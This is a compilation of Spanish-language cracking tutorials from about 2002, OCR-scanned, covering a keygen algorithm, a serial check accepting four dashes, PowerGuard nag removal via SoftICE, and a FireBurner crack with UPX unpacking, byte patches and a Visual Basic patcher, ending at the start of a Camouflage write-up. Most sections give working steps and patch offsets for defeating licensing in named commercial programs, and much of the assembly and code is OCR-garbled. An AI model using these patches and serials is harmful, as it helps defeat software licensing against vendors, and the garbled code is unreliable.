como SUBTOTAL y TOTAL, 

A continuacion cogemos el total y lo multiplicamos por cuatro y asi obtenemos un nuevo TOTAL. 


La siguiente operacion se limita a sumar al total el subtotal que teniamos guardado, consiguiendo un nuevo TOTAL, 

Aqui decia que habia trampa, porque los numeros de las multiplicaciones son en real-extendido muy parecidos, y como 
llevaba un ritmo de ir descartando los subtotales que tenia, y siempre trabajaba con el ultimo total conseguido, en esta 
operacion anterior, sino estas, ala guay, en principio parece que sume el total dos veces, que es lo que me pareció a mi, y 
me llevo un ratito de culo, pues no cuadraban los resultados. 


Bien una vez aqui se coge el TOTAL se le resta 5F5B9FOh. que viene a ser en decimal 99990000, y conseguimos un nuevo 
TOTAL. 


Para seguir a partir de aqui hace las siguientes comprobaciones. 
primera si el resultado es positivo o negativo. 
SI EL RESULTADO ES POSITIVO 
Si es positivo mira si es inferior a 989680h. o 10000000decimal. 
si es inferior a 10000000, le suma al TOTAL los 10000000.- 
Y ya tenemos un nuevo TOTAL. 
SI EL RESULTADO ES NEGATIVO 
Si el resultado es negativo lo pasa a positivo con el mismo valor 
Y si es inferior a 10000000dec. le suma al total positivado los 
10000000dec. y ya tenemos un nuevo TOTAL. 


Ya casi lo tenemos, despues de tanta movida aun quiere mas, y coje la primera letra del nombre, la multiplica por dos, y el 
resultado lo suma al total, con lo cual obtenemos un nuevo TOTAL y definitivo. 


Solo falta transformar este total en base Real-extendido 64bits a decimal 
y ya tenemos el numero deseado. 


Bien no?. 

En principio es un trabajo bastante comun de obtener un numero en base a un nombre 

con una serie de operaciones, más o menos complejas. 

Lo que yo he encontrado muy bueno, es la introducción de unas operaciones, que los que no tenemos conocimientos muy 
profundos de la informatica, nos sorprenden y que considero que se tienen que conocer, y estas estan muy relacionadas, por 
los datos que he acumulado, con el funcionamiento de coprocesador, y como trabaja la FPU y la pila de la FPU, y el efecto 
FIFO, ultimo de entrar primero en salir. 

Yo en base a lo que he acumulado intentaré poner que hace cada orden. 


Veamos.. las instrucciones de carga (fld y fild) Float Load u Float | nteger Load respectivamente cargan un valor de una 
determinada direccion de memoria que puede ser de diferente tamaño y puede ir incluso indexada por algun registro... 
Ejemplos: 


fild Dword Ptr ds: [ MiVariable] 
Cargaria un entero de 32bits de la direccion de memoria "MiVariable" 


fld QWord Ptr ds: [eax] 
Cargaria un real de 64bits de la direccion de memoria direccionada por eax. 


Estas instrucciones introducen ese valor en la pila del coprocesador... esta pila es de tipo FIFO (First In First Out) es decir... si 
nosotros cargamos un valor en la pila con fld el primer valor que sacariamos en caso de hacer un fst seria este. 


| El funcionamiento es exactamente igual que el manejo de pila del propio procesador.. es decir.. las instrucciones push y pop 
... las Load serian el push y las Store serian el pop... 


Las diferencias son: 


Hay 8 posiciones de pila (vamos, esta limitado) 
Las posiciones de la pila son referenciadas por unos registros para poder trabajar con ellas. St(0) St(1)... 


St(0) siempre apunta al ultimo valor introducido en la pila.. este sera el primero en salir claro. 
St(1) al siguiente, etc ,etc 


Si nosotros realizamos un fadd st(0),st(1) la operacion es la siguiente. 
St(0) = St(0)+ St(1); 


Como ves es lo mismo que hacer un add solo que se trabaja con la pila del coprocesador y no con registros normales... para 
hacer util el resultado hay que extraerlo de la pila usando alguna instruccion de store... 


El unico problema que tiene esto es que si tu haces fadd st(3),st(5) ... el resultado queda en st(3) y antes de que salga este 
han de salir de la pila st(0),st(1) y st(2).... 


Las instrucciones de store toman un valor de la pila ( st(O) ) y lo almacenan en una posicion de memoria... 

Te las enumero: 

fst [Memoria] <-- Toma el valor de st(0) y lo introduce en la memoria correspondiente. 

fist [Memoria] <-- Toma el valor de st(0) lo convierte a entero y lo introduce en memoria. 

fistp [Memoria] <-- Toma el valor de st(0) lo elimina de la lista con lo cual st(1) pasa a ser st(0) , st(2) pasa a ser 
st(1), etc y lo introduce en memoria. 

fstp [Memoria] <--- Idem que la anterior pero sin conversion a entero. 


Memoria puede ser una constante ej: 
fstp ds: [MiVariable] 

o usando un registro para indexado ej: 
fist ds: [eax]. 


Como comprobareis no hay instrucciones para pasar un valor de un registro de proposito general a una posicion de pila de 
copro y encima solo podemos introducir y sacar al estilo pila... esto en principio es algo lioso de pillar y complica a veces la 
programacion de alguna ecuacion, pero una vez te has acostumbrado ya no es tanto trauma. 


Estas serian las operaciones principales, pero como habeis visto hay otras, que 
utiliza en este crack, que intentare explicar, y no son todas, porque hay un mogollon. 


FCOMP st(1) Esta es bastante facil pues lo que hace es en este caso comparar lo 
que hay en st (0), cima de la pila con st (1). 

FSTSW AX aqui solo he llegado a saber que guarda la palabra de estado de la 
FPU, en AX. Para ampliar esto necesitareis alguien mejor preparado 
que yo 

SAHF Aqui solo puedo decir que copia en los flegs del procesador los 

correspondientes bits de AH. 

FXCH st(1) Esta orden intercanbia los valores de st(0) y st(1) 

FYL2X esta es el siguiente calculo (st(1)*log2(st(0))). el que quiera que se 

entretenga con el. 

FRNDINT redondea el valor de st(0) al entero mas proximo y lo deja en st(0). 

F2XM1 esta es otro calculo, calcula 2 elevado a st(0)-1 y lo deja en st(0). 

aqui no me quedo claro si es 2elevado a st(0)-1 
O la operacion es 2 elevado a (st(0)-1), pero esta es la idea. 

FSCALE otra operacion, multiplica st(0)por 2 elevado a st(1) y como siempre 

deja el resultado en st(0). 


y termino, para los que saben de informatica a tope esto debe ser facilito 
pero, para los menos buenos, tiene su tela y es interesante saberlo y darse 
| una vuelta por las paginas de Intel ¡ Cia, para descubrir el copro. 


He terminado. 

Me lo puso muy mal el DeAtH, pero al final pude hacer el generador, no es que sea del todo correcto, tiene sus trampillas, 
pero funciona. 

Con todos estos datos al que le interese, puede hacerlo. 

supongo que habrá fallos de todo tipo, desde ortograficos a definiciones, 

me gustaria que me los comentarais, pues lo que hago, es para aprender yo y acepto todos los consejos. 


nandoistteleline.es 


AGRADECIMIENTOS. Los hay para mucha gente, pero en especial a Victor J urado 
y a Crick(que pesado soy, pero me ayudaste mucho) y como no a Karpoff. 
Hasta otra. 
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INTRODUCCIÓN 


Después de mucho leer, practicar y fallar. Algo he aprendido y eso es lo que pretendo compartir en este my 
primer tutorial ((( Espero que no sea el último ))). Tratare de explicar lo mejor que pueda todo lo que hice para 
encontrar el serial Valido justificando lo mejor que pueda cada PAso. 

La protección en si es bastante simple y será súper fácil de seguir 


Al ATAKE 


YAp, vamos al grano. Instalamos el Programa y no aparece nada extraño en el registro, no modifica ningún archivo de 
windows ((( entiendase autoecxec. bat, sistem.ini, win.ini ....etc ))), por tando solo tendremos que abocarnos al ejecutable 
SP.EXE el cual esta escrito en Visual C++ sin encriptar ni nada raro. 


Aunque solo usaremos el Softice para encontrar el numero de registro no esta de más sacarle una copia a SP.EXE 
... ((Gmás vale prevenir que curar o reinstalar!!!!))) 


Cargamos SP.EXE en Simbol loader del SOFTICE ... como ?¿ 


Muy simple, abrimos el Simbol loader del SOFTICE, le damos a a buscamos SP.EXE luego Ey 


aquí nos marca un error le damos al [$ =] y salta el SOFTICE en el punto de inicio del SP. 


Ahora con F5 dejamos correr el programa y aparece un linda ventanita de Registration la cual nos entrega un ID 


igual a 9TQ5R9-UVXA99-FRVKV2-C9BX79 y pide un Registration Code lo lógico seria que este ID sea distinto 
para cada PC ((suponiendo que dependiera del Hardware )) 
Si introducimos un Registration Code "691350" nos lanza una ventanita de error (ALgo Clasico no ?¿ ).. 


Ahora si que sip!!!! introducimos un Registration Code "691350" entramos al SOFTICE ((Ctrl +D )) empezamos 
con un Break-Point clásico, GetWindowTextA ((bpx getwindowtexta)) salimos del SOFTICE ((Ctrl +D )) le damos 


al botón y salta el SOFTICE producto del BPX. Apretamos un F12 para finalizar la rutina de la 


librería User32 y caemos de una en SP ...específicamente en el siguiente pedazo de código: 


FF1544565700 CALL [USER32!GetWindowTextA] 
8B4C2408 MOV ECX,[ESP+08] 

GAFF PUSH FF 

E821350000 CALL 0053350B 

EBO0C JMP 0052FFF8 

8B01 MOV EAX,[ECX] 

FF742408 PUSH DWORD PTR [ESP+08] 
FF9088000000 CALL [EAX+00000088] 

5E POP ESI 

C20400 RET 0004 


El cual no nos entrega mucha información y realmente no se que es lo que hace, pero después de unos pocos F10 
llegamos al ret de la rutina y salta al algo que es realmente interesante. 


8BOF 
33ED MOV ECX,[EDI] da 
33C0 XOR EBP,EBP EBP se deja en cero 
8BSIF8 XOR EAX,EAX EAX se deja en cero 
85D2 MOV EDX,[ECX-08] 
7E11 TEST EDX,EDX Ñ 
so3co12 E  004DOCDI (Cno jump ))))))) 
se 7501 CMP BYTE PTR [EAX+ECX], 2D se compara [EAX+ECX] con 2d 
004D0CC0** 45 JNZ  004D0CC7 Salta si no son iguales* 
40 INC  EBP Incrementa en 1 EBP 
si 3BC2 INC” EAX Incrementa en 1 EAX 
004D0CC7 * 7CF4 CMP EAX,EDX Compara EAX con EDX 
83FD04 JL 004D0CC0 Salta si es menor EAX** 
7451 CMP EBP, 04 Compara EBP con 4 
JZ 004D0D22 Salta si EBP es igual a 4 


Con una simple inspección el el registro ECX ((d ECX)) en la primera linea de codigo encontramos algo muy 
interesante... Sip el 691350 y ademas HDZ-4050-P9JFE-RT8TVI-12621 que te digo ?¿ es el Registeration Code que 
estábamos buscando. 


Pero como buen estudiante de Ingeniería Civil Química y aprendiz de Cracker no podia dejar la cosa asi::: 


Si miran con atención el trozo de código que esta destacado... mmmm lo notan?¿ Si-No aquí va my explicación. 
Primero noten como EBP y EAX se dejan en cero y a EDX se le asigna un valor que depende de la cantidad de guiones 
(-) que posea el Registeration Code. 

Se comienza comparando el elemento que esta en [EAX+ECX] ((( el primer numero del Registeration Code))) luego 
si es igual a '2D' (((2D es " - " en ASC))) no salta he incrementa EBP y EAX en 1 sino solo incrementa EAX ... Al ir 
creciendo EAX nos desplazamos un lugar dentro del code, es decir vamos elemento por elemento buscando los 
guiones '2D' dentro del Registeration Code y cada ves que encontramos uno aumentamos en uno el contador EBP 
((EBP cuenta los guiones)). 

Este ciclo se repite mientras EAX sea menor a EDX cuando EDX es igual a EXA se sale del ciclo y se compara 
EBP con 4 ((revisa si el Registeration Code tenia 4 guiones)) si se cumple logramos el éxito, sino nos envía la 
Ventanina indicando que el code es Erróneo..... 


Tenemos dos contadores uno que cuenta guiones (EBP) y otro (EAX) que permite avanzar elemento por 
elemento dentro del Registeration Code donde solo se revisan EDX elementos de este. Al terminar el 


ciclo se revisa si en los EDX elementos del Registeration Code se encontraron 4 guiones, si este es el 
caso el Registeration Code es aceptado 


SI toda esta teoría es cierta basaría con poner ---- como Registeration Code para ser aceptado... ADIVINEN QUE 
PASO 


El Programa es Gueno pero la Protección deja bastante que desear, aunque si buscan un buen sistema Tex/LaTeX para 
Giiindous te recomiendo Miktex el cual puedes en-contrar en sourceforge en forma totalmente gratuita bajo licencia 


Chaop !!!! 


Si algo no quedo muy claro o si cometi algun error no 
dudes en comunicarnelo 


Vuela tu Cabeza... Fuma DINAMITA !!!! 


My Web Pager:_http: www. udec. cl —rafgonza 
My dirección de e-mail: rafgonzaQudec. cl 


My dirección de e-mail: rafgonzaQudec. cl 
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Power Guard v1.0 (Sin Armadillo) 


Nag 

Eliminar la Nag con un metodo propuesto por Auspex 

Protege archivos hechos en PowerPoint mediante contraseñas. 
Muy Sencillo 


http://www.digitalcandle.com 


Softice, Editor Hexadecimal 


AUSPEX FECHA: 01/10/2002 


INTRODUCCION 


Este tutorial podría ser una continuación al que he escrito sobre el programa PowerGuard. Lo he separado por 
que se trata de eliminar una Nag, pero por medio de un método que se me ocurrió a lo largo del crack, un 
método que pienso yo que puede ser algo muy interesante de ver y estudiar, y por eso me gustaría compartirlo 
con todo el munndo. Quizas algún dia lo llamen el Método AuspexX, jejeeejee, eso sería estupendo. 


Estoy seguro de que a alguien se le habrá ocurrido alguna vez, asi que no pretendo decir que he descubierto 
algo nuevo y revolucionario, pero lo que si puedo decir es que jamas lo he leido en ningún tutorial, en 
ninguno, y creedme, he leido muchos. Por ese motivo quiero escribir este, y compartir toda la información 
que pueda transmitir, y si a alguno de los lectores ya se le había ocurrido la idea que voy a proponer, por 
favor, que no se sientan ofendidos. 


AL ATAKE 


Bueno, la cosa va de eliminar una Nag, concretamente esta ventanita: 


PowerGuard 
MOONLIGHT 


SOFTWARE 


SECURITY E SOFTWARE :: SOLUTIONS 


[res 00 


Estuve dandole vueltas a la cabeza a ver como eliminar esta sencilla nag y se me ocurrió una gran idea, os lo explicaré: 


Una feliz idea 


Cuando nosotros corremos un programa en Windows, que es un Sistema Operativo multitarea, éste reparte dichas 
tareas en el tiempo a cada aplicación que está ejecutándose en memoria (cada aplicación tendrá una prioridad u otra, 
Windows gestionará esto). Cuando nosotros estamos frente a una nag, el programa se encuentra en un bucle hasta que 
el usuario pulsa, por ejemplo, un botón de OK, entonces el programa sale del bucle y continua ejecutándose. Pues, ¿por 
qué no adentrarnos en dicho bucle?. Este loop se encontrará en una función, y con F12, pulsadas repetidas veces 
llegará un momento en el que se saldrá de dicha función principal. Una vez que nos salgamos desaparecerá Sice y 
estaremos de nuevo con la nag. Ahora sólo tenemos que pulsar OK, y Sice saltará él solito justo en el código que 
nosotros queremos. Estamos fuera de la función que provoca el bucle, y no nos ha hecho falta enganchar ninguna API 
ni nada por el estilo. 


¿Pero cómo hacemos esto?, ¿cómo nos metemos en el bucle?, vamos a ver, cuando estamos con la nag en panatalla y 
nos metemos en el Sice, no se está ejecutando el código del programa, sino otro que se encuentra en el núcleo del 
Sistema Operativo, kernell32.dll (en el Sice nos aparece con el nombre de acpi, ¿verdad?), por lo tanto nos hemos de 
meter en el espacio de memoria de nuestra aplicación y una vez alli, hemos de enganchar el flujo del proceso, es decir, 
encontrar las instrucciones por donde se está ejecutando el bucle y detenerlo. 


Para los que no hayan leido el tutorial que escribí sobre Armadillo 2.60, os diré que existen dos comandos clave para 
adentrarnos en la memoria de la aplicación: proc, addr CONTEXT. El primero nos dará una serie de datos sobre cada 
proceso que se está ejecutando, el que nos interesa a nosotros es Context. El segundo nos vale para meternos en su 
espacio de memoria. El proceso que lleva el asterísco es el que estamos depurando con Sice en ese momento. 


Para detener el bucle sólo basta con poner un bpr INICIO FIN r. INICIO y FIN son los rangos donde ustedes penseis 
que está dicho bucle, por ejemplo en una sección o, si no lo sabeis, en todo el ejecutable. 


Si ahora pulsais intro, al instante Sice saltará y ya estais en el bucle del proceso. Ahora pulsar F12 hasta que os salgais 
del Sice. Lo único que queda es pulsar el botón de continuar y listo, ya estamos fuera de la función que provoca el 
bucle, ahora depende de cada uno encontrar la llamada a la Nag, pero os aseguro que es sencillo, un par de Fl2 e ir 
comprobando mediante bpx donde se llama a la nag. 


Con este método que os propongo podeis solucionar muchos de los problemas que se os plantean a la hora de eliminar 
nag, o cualquier cosa en donde querais adentraros en su código con un click de ratón y no sepais la forma de hacerlo 
por que no se os ocurre la API correcta para adentraros, etc... Creo que puede ser una buena idea, ¿no?. 


Demostremos que el método funciona eliminado la nag de PowerGuard: 


Arrancamos el programa, y esperamos a que nos salga la nag. Ahora nos metemos en el Sice y buscamos el campo 
Context de PowerGuard con el comando proc, me sale D37D6F10. Ahora ponemos el comando addr D37D6F10 y 
pulsamos intro. Ya estamos en la memoria de PowerGuard, ahora pongamos un bpr 401000 494000 r (es la primera 
sección, CODE). Nos salimos y vemos como al instante Sice salta. Eliminamos el bpr (bc 0) y pulsamos F12 hasta que 
nos salgamos de Sice. Una vez fuera, pulsamos el botón OK y Sice vuelve a saltar, ya estamos donde queremos, ahora 
busquemos la posible llamada. En este caso después de unos cuantos F12 me encuentro que salgo de un CALL [EDX 
+ E8]. Se me ocurre poner un bpx en dicha llamada y volver a ejecutar la aplicación. Una vez que Sice salte, nos 
metemos dentro con F8 y ensamblamos un RET. Ya no volverá a salirnos nunca más la dichosa nag, pero existe un 
pequeño inconveniente, tampoco nos saldrán ciertas otras ventanas, aunque sin importancia. Lo que ha pasado es que 
hemos eliminado una función que se utiliza para sacar varias ventanas diferentes. La solución a esto es sencilla, 
comprobar si el programa pasa por el CALL [EDX + E8] una sola vez o varias. Sólo hemos de ejecutar y examinar la 
aplicación con el bpx en la llamada. Observamos que sólo pasa una vez y es para sacarnos la nag. Pués entonces sólo 
queda nopearla. 


NOTA IMPORTANTE: Cuidado con los Push, si los hay antes del CALL también habra que nopearlos para evitar un 
descuadre de la pila. No se os ocurra nopear nunca una llamada de este tipo a menos que esteis completamente seguros 
de lo que haceis, por que llama a direcciones que dependerán de un registro, lo que quiere decir es que dicha dirección 
puede ir variando a lo largo de la ejecución del programa, por lo que un nopeo de dicho CALL podría provocará 
errores. En este caso, como hemos visto, sólo se llama una vez, por lo que podemos nopearlo sin problemas. 


El tema de cambiar los bytes con el editor hexadecimal me lo voy a saltar, ¿ok?. Bueno pues se acabó lo que se daba. 


Notas finales: 


Espero que hayais entendido el método que os propongo, si es que me he explicado bien, por que la verdad es que soy 
como un libro cerrado xD. Es muy eficaz, lo he probado con diferentes programas, nag's con boton, nag's temporal, y 
se puede aplicar a todos dando buenos resultados. Lo mejor de todo es que ya no hay necesidad de echar mano a la 
API, como por ejemplo DialogBoxParamA ni a los mensajes de windows como WM_DESTROY (este es muy usado 
y bastante efizas tambien). 


Mando un saludo a todo el mundo y hasta el proximo tuto. 


auspexxxO hotmail. com 
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FireBurner v2.1.7 Windows Edition 


Numero de Registro 
Simular estar Registrados. Codificación del Patch! en Visual Basic 6. 


FireBurner v2.17 es una de las mejores herramientas de creación de CDs para Windows 9x/2000 
y Linux. 


NewBie, eso creo yo ....:)D 


hhttp://www.fireburner.com/ 


file insPEctor XL (o similar) W32Dasm v.8.93 (o similar) Numega Softlce v.4.05 Visual 
Basic 6 


+ErOser FECHA: 05/10/2002 


INTRODUCCION 


Bien amigos mios, otra vez con esta appz jejejjejee, lo mio ya es obsesión. Como podreis observar el 


Sistema de Protección no ha variado en absoluto, jejjeeje mucho mejor para NOSOTROS)). 


Las Herramientas que vamos a emplear, en esta "Victima" como siempre va a ser el file insPEctor XL, 


nos dirá si nuestra "Victima" esta empaquetada, compilador, etc, ... 


Toda esta información nos ayudara para un atake más rápido. 


Pues, nada Manos a la Obra ....... 


AL ATAKE 


FireBurner v2.17 es una de las mejores herramientas de creación de CDs para Windows 9x/2000 y Linux. 


- Comunicación inteligente entre nuestra Grabadora IDE o SCSI atraves de cualquier dispositivo ASPL. 
- Metodos de Grabación Session-at-Once (SAO), Disk-at-Once (DAO) o Track-at-Once (TAO). 

- Creación de Disco Imagen "Cue/Bin" en formatos ISO, WAV, y raw PCM. 

- Comprobación de Errores. 

- Informe detallado sobre el estado y compatibilidades de nuestros dispositivos. 


SAO (Session-at-Once) = Grabar Sesion cada vez. 
DAO (Disk-at-Once) = Grabar Todo el CD de una vez. 
TAO (Track-at-Once) = Grabar una Pista cada vez. 


Y muchas más opciones, ... 


ADVERTENCIA : El texto de este artículo esta escrito con fines didácticos, para mostrar simplemente como funciona 
el sistema, por el cúal queda anotado todo lo que compramos. El autor no se hace responsable de cualquier uso ilegal 
que se le den a estos conocimientos. 


Manos a la Obra | 


Arrancamos el file insPEctor XL y cargamos nuestra "victima" y observaremos lo siguiente, en pantalla: 
FireBurner v2.17 Windows Edition esta Comprimido con UPX 0.89.6-1.02/1.06-1.07. 


P3 Modificar | CI Herramientas | We Pros | <2 Procesos | acercado... | 


5 ostospe | [A cobezeramz | (=] Secciones | Funciones [ E 
¡Compilador Compresor ¡Protector 


Signatura: < 60 BE 00 EO 48 00 8D BE 00 30 F7 FF C7 87 0C D7 08 
00 F9 58 7F 38 57 83 CD FF EB DE 90 90 90 90 SA DS 46 CodoDaemon 
88 07 47 01 08 75 07 88 1£ 83 > 


[M Permitir amálisis heurístico 


[a ] [Ó aber archivo... > LO Analizar O so 


CWrchivos de programa FreBumer FreBumer exe ) 0,453 secs. 


La siguiente aproximación, será DESCOMPRIMIRLO, llegados a este punto, emplearemos el UPX v1.02w. con la 
opción -d (descomprimir). 


CNAUPX>Upx -d Fireburner.exe 


Ultimate Packer for eXecutables 
Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001 
UPX 1.20w Markus F.X.J Oberhumer € Laszlo Molnar May 23rd 2001 


File size Ratio Format Name 


754176 <- 282624 35.90% win32/pe fireburner.exe 


Unpacked 1 file. 


Una vez descomprimido, comencemos a trabajar con nuestra "victima". 


- Observar el proceso de Registración de la appz. 
- Buscar Strings, emplearemos W32Dasm. 


Proceso de Registración del 
FireBurner v2.1.7 


Objetivo- 1 
Cargamos la appz FireBurner, y observamos la siguiente Pantalla de Registración : 


fa FueBumer 


Nuestro Primer Objetivo esta claro, deberemos eliminar esa molesta NAG-Screen para que no aparecera más la Pantalla de 
Registración. 


Objetivo-2 


Seguimos estudiando, pulsamos I Agree y como podeis observar aparece la Ventana Principal de la appz con el Texto: 


FireBurner 2.1.7 Windows Editon (Unregistered) <-- NO ESTA REGISTRADO. 


Pé FireBurmer 2.1.7 Windows Edition (Unregistered) Al E 
File Configuration Layout Create CD Help 


¡DiscType: Unknown 
Track +4 Mode | Sector Size Pregap Time Track Time Postgap Time Total Time Source Filename 


Objetivo- 3 
A continuación, pulsamos la opción Help y seleccionamos About, nos aparecera la siguiente pantalla: 


Fig About MES 


FIREBURNER 


Una vez, que ya tenemos claro los Objetivos a seguir, nos ponemos a trabajar con el W32Dasm. 


Usando el Softl CE 


Establecemos un BreakPoint 
USER32_CreateWindowExA (DWORD, LPSTR, DWORD, DWORD, DWORD, DWORD) 

en el 99.9% de los casos emplearemos este BreakPoint en las appz realizadas en 
Delphi. 


Activamos el Softlce y establecemos el BreakPoint 'BPX CreateWindowExA' pulsamos 
CTRL+D, 

o bien, F5 para regresar a Windows. A continuación ejecutamos el FireBurner y 
aterrizaremos 

dentro del Softlce. Seguiremos los pasos de siempre, pulsamos F12 hasta llegar al 
código del 
FireBurner, una vez dentro empezaremos a tracear con F10, y observaremos lo 
siguiente: 


Objetivo-1 

JP [FRA ARIK KARA RRA AA Program Entry Point KKXXXXXX 

:00491404 55 push ebp 

:00491405 8BEC mov ebp, esp 

:00491407 83C4F0O add esp, FFFFFFFO 

:0049140A 53 push ebx 

:0049140B B82C114900 mov eax, 0049112C 

:00491410 E83758F7FF call 00406C4C 

:00491415 8B1D0C464900 mov ebx, dword ptr [0049460C] 
:0049141B 8B03 mov eax, dword ptr [ebx] 


:0049141D E8SEEOOFDFF cal1 00461510 

:00491422 A104444900 mov eax, dword ptr [00494404] 

:00491427 803800 cmp byte ptr [eax], 00 ; Serial CORRECTO == 
Serial Dummy 

:0049142A 7531 jne 0049145D ; Si NO es igual 
:0049142C 8BOB mov ecx, dword ptr [ebx] ; "THANK YOU FOR 
TRYING..." 

:0049142E B201 mov dl, 01 ; ROffset 9082Ah 


| Usando el W32Dasm 


Ejecutamos el W32Dasm y seleccionamos Open the File to Disassemble seleccionamos Fireburner.exe, una vez finalizado 


el proceso, pulsamos el botón String Data References y comenzamos a la caza de los Obj etivos 2, 3. 
Objetivo- 2 


*** Buscamos la String "FireBurner 2.1.7 Windows Edition (Unregistered)" 


* Possible StringData Ref from Code Obj ->";¡|DI" 


:00490969 C780F8000000BC0C4900 mov dword ptr [ebx+000000F8], 00490CBC 


:00490973 C683D403000000 mov byte ptr [ebx+000003D4], 00 

:0049097A A104444900 mov eax, dword ptr [00494404] 

:0049097F 803800 cmp byte ptr [eax], 00 ; Serial CORRECTO == 
Serial Dummy 

:00490982 740E je 00490992 ¿; Si es igual "... 
(Registered) " 


; (Offset 8FD82h 
; Cambiamos por 750E => 
JNE 


* Possible StringData Ref from Code Obj ->"FireBurner 2.1.7 Windows Edition " 
=>" (Registered) " 


:00490984 BA7COA“L900 mov edx, 00490A7C 
:00490989 8BC3 mov eax, ebx 
:0049098B E89810FBFF call 00441A28 
:00490990 EBOC jmp 0049099E 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00490982 (C) 


* Possible StringData Ref from Code Obj ->"FireBurner 2.1.7 Windows Edition " 
=>" (Unregistered)" 


:00490992 BAB40A4900 mov edx, 00490AB4 
:00490997 8BC3 mov eax, ebx 


*** Al cambiar el SALTO CONDICIONAL (JE) por SALTO INCONDICIONAL (JNE), observaremos la 
siguiente pantalla: 


Pg FireBurner 2.1.7 Windows Edition (Registered) 
File Configuration [ 


DiscType: Unknown 


Track ++ Mode | Sector Size Pregap Time Track Time Postgap Time Total Time Source File 


Objetivo- 3 


*** Buscamos la String "Please Register your copy" 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0048CF7B (C) 


:0048CF7D 008BCO535651 add byte ptr [ebx+515653C0], cl 

:0048CF83 8BD8 mov ebx, eax 

:0048CF85 A104444900 mov eax, dword ptr [00494404] 

:0048CF8A 803800 cmp byte ptr [eax], 00 ; Serial CORRECTO == 
Dummy 

:0048CF8D 7425 je 0048CFB4 ; Si es igual "Please 
Register..." 


; ROffset 8C38Dh 
; Cambiamos por 7525 => JNE 


* Possible StringData Ref from Code Obj ->"This Copy Registered to" 


:0048CF8F BA1CDO4800 mov edx, 0048D01C 

:0048CF94 8B83F4020000 mov eax, dword ptr [ebx+000002F4] 
:0048CF9A E8894AFBFF call 00441A28 

:0048CF9F 8B15FC454900 mov edx, dword ptr [004945FC] 
:0048CFA5 8B12 mov edx, dword ptr [edx] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0048CF36 (C) 


:0048CFA7 8B83F8020000 mov eax, dword ptr [ebx+000002F8] 
:0048CFAD E8764AFBFF call 00441A28 
:0048CFB2 EB1O jmp 0048CFC4 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0048CF8D (C) 


* Possible StringData Ref from Code Obj ->"Please register your copy" 


:0048CFB4 BA3CD0O4800 mov edx, 0048D03C 
:0048CFB9 8B83F4020000 mov eax, dword ptr [ebx+000002F4] 
:0048CFBF E8644AFBFF call 00441A28 


Serial 


*** Al cambiar el SALTO CONDICIONAL (JE) por SALTO INCONDICIONAL (JNE), observaremos la 


siguiente pantalla: 


Fé About 0 ES 


FIREBURNER 


Bueno, como podéis ver ya hemos FINALIZADO la Simulación de la 
Registración jejeje;) Ahora solo nos queda CODIFICAR el Patch!. 


| Codificar el Patch! 


' Name: VB Patch Engine 
' Author: +Erfser[GT2] 
' Created: Jueves, Abril 11,2002 Q 8:23:23 pm (Vers: 1.0.0000) 


Description: FireBurner 2.1.7 Windows Edition 


"00090820 FDFF A104 4449 0080 3800 “7531 8B0B B201 <- Objetivo-1 ROffset 9082B 
'"0008FD80 3800 740E BA7TC 0A49 008B C3E8 9810 FBFF <- Objetivo-2 ROffset 8FD83 
'"0008C380 5356 518B D8A1l 0444 4900 8038 0074 25BA <- Objetivo-3 ROffset 8C38E 


Private Sub Command1l_Click() 
If FileExist(Text5) Then 
On Error GoTo Cancelo 
Dialogo.CancelError = True 
With Dialogo 
Dim Tamaño As Long 
Tamaño = 754176 "tamaño descomprimido 754176 <- 262144 
If FileLen(Text5) <> Tamaño Then 
MsgBox "Filesize does not match!", 16, "+Erfser[GT2]" 
Else 
Open Text5 For Binary Access Write As +1 
Put $1, £H8FD83, £*HE75 'RCOffset 8FD83h 
Put $1, £H8C38E, £H2575 'ROffset 8C38Eh 
Put $1, £H9082B, £H3174 'ROffset 9082Bh 
MsgBox "Patch Successful!", 64, "+Erflser[GT2]" 
End If 
End With 
On Error GoTo 0 
Exit Sub 
Close +1 
Cancelo: 
Else 


End If 
End Sub 


Saludos 


PrfEsOr X, SiLvEr StOrM, Karpoff, Demian, Black Fenix, Numit_oR, Esiel 2, KUT, TNT, WKT 
Todo el DREAM TEAM de la Compilación de Tutoriales 2001 CdT2001 :) 


Saludos a todos los CrAcKeRs del Pasado, Presente y Futuro 


Nota: 


e Soy humano y cometo errores, si encuentras uno házmelo saber OK. +ErCser'2000/GT2 


Si deseas ponerte en contacto con nosotros puedes hacerlo aquí: Group Tutoriales 2001 - GT2 


e Si deseas aparecer en la compilación envía tu tutorial a: profesor_xGhotmail.com 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 
lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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Disclaimer 


Karpoff Spanish Tutor 1999-2002 


Camouflage 1.2.1 


Es Freeware 


Como este es un programa FreeWare no hay nada que petar o ningún serial que vulnerar. No 
obstante tiene un punto flaco que es por lo que lo vamos a atacar 


Segun la filosofia de este programa, sirve para ocultar información para los ojos de 
desaprendidos dentro de otros ficheros, pero, como lo oculta ? Relamente utiliza ténicas de 
esteganografía ? Encripta la información ? Que tan seguro és ? 


Aficionado 


hhttp://www.camouflagesoftware.com/ 


Softlce, FC32b 
[Moneo] FECHA: 01/02/2002 


INTRODUCCION 


Si estas buscando cracks o serials, aqui no los vas a encontrar. Todo lo que aquí se describe es 
puramente didactico, lo que el usuario final realice con dicha información sólo le acontece a él. 
Te recomiendo que si tienes la oportunidad adquieras el programa de forma legal, ya que de 
esta manera contribuyes a que el programa continue desarrollandose. 


El autor sólo pretende ensenyar los diferentes métodos de protección que tienen los programa, 
no abusando de dicha información 


Overview 


These days companies are given more power to monitor emails and to examine your personal files. 
And with more and more malicious 'spy' software being widely used, you need to be sure that files 
containing sensitive information are kept safe from prying eyes. Electronic privacy is no longer 
guaranteed - who knows who might be intercepting your emails or scanning your hard drive without 
your knowledge or consent? 


Camouflage allows you to hide files by scrambling them and then attaching them to the file of your 
choice. This camouflaged file then looks and behaves like a normal file, and can be stored or emailed 
without attracting attention. 


For example, you could create a picture file that looks and behaves exactly like any other picture file 


but contains hidden encrypted files, or you could hide a file inside a Word document that would not 
attract attention if discovered. Such files can later be safely extracted. 


For additional security you can password your camouflaged file. This password will be required when 
extracting the files within. 


You can even camouflage files within camouflaged files. 


AL ATAKE 


